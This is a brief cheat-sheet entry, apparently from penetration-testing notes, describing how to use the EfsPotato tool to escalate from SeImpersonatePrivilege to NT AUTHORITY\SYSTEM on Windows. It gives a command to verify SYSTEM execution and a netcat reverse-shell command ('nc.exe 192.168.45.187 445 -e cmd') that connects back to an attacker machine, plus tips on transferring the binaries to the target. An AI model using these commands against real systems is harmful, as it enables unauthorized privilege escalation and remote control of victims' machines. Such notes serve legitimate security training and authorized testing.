EfsPotato

Description

Windows privilege escalation tool that is a variant of the potato family of attacks. It exploits SeImpersonatePrivilege to escalate privileges to NT AUTHORITY\SYSTEM. EfsPotato can be used as an alternative when PrintSpoofer fails.

Usage 1: Verify Execution as SYSTEM

Run a simple command like whoami through EfsPotato to confirm it executes as NT AUTHORITY\SYSTEM.

Command:

.\EfsPotato.exe 'whoami'

Usage 2: Get a Reverse Shell as SYSTEM

Use EfsPotato to execute nc.exe and obtain a reverse shell as NT AUTHORITY\SYSTEM back to the attacker machine.

Command:

.\EfsPotato.exe 'nc.exe 192.168.45.187 445 -e cmd'

Notes

Requires SeImpersonatePrivilege to be enabled (check with whoami /priv).
EfsPotato is a good fallback when PrintSpoofer does not work (e.g., timeout errors).
Transfer EfsPotato.exe and nc.exe to the target machine before execution.